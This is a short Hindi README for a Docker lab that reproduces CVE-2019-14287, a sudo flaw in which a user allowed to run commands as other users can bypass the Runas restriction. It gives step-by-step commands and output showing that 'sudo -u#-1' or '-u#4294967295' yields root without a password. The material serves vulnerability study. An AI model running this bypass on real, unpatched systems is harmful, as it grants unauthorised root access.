
# Docker-आधारित PoC जो CVE-2019-14287 sudo विशेषाधिकार वृद्धि को Runas उपयोगकर्ता प्रतिबंध बाईपास के माध्यम से प्रदर्शित करता है, चरण-दर-चरण पुनरुत्पादन निर्देशों के साथ।
यह sudo की भेद्यता (CVE-2019-14287) को Docker कंटेनर पर पुनरुत्पादित करने वाला एक नमूना है।
docker compose up -d से कंटेनर शुरू करेंdocker exec -it vulnerable_sudo_app bash से कंटेनर में प्रवेश करेंwhoami और id कमांड चलाकर पुष्टि करें कि आप एक सामान्य उपयोगकर्ता हैं (root नहीं)
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
sudo -u#0 whoami और sudo -u#0 id -u निष्पादित नहीं किए जा सकते
-u विकल्प) के रूप में 0 (root) निर्दिष्ट करके निष्पादित करें$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
sudo -u#-1 whoami और sudo -u#-1 id -u चलाकर पुष्टि करें कि बिना प्रमाणीकरण के root के रूप में कमांड निष्पादित किए जा सकते हैं (भेद्यता का पुनरुत्पादन)
-u#4294967295 के साथ भी ऐसा ही किया जा सकता है$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0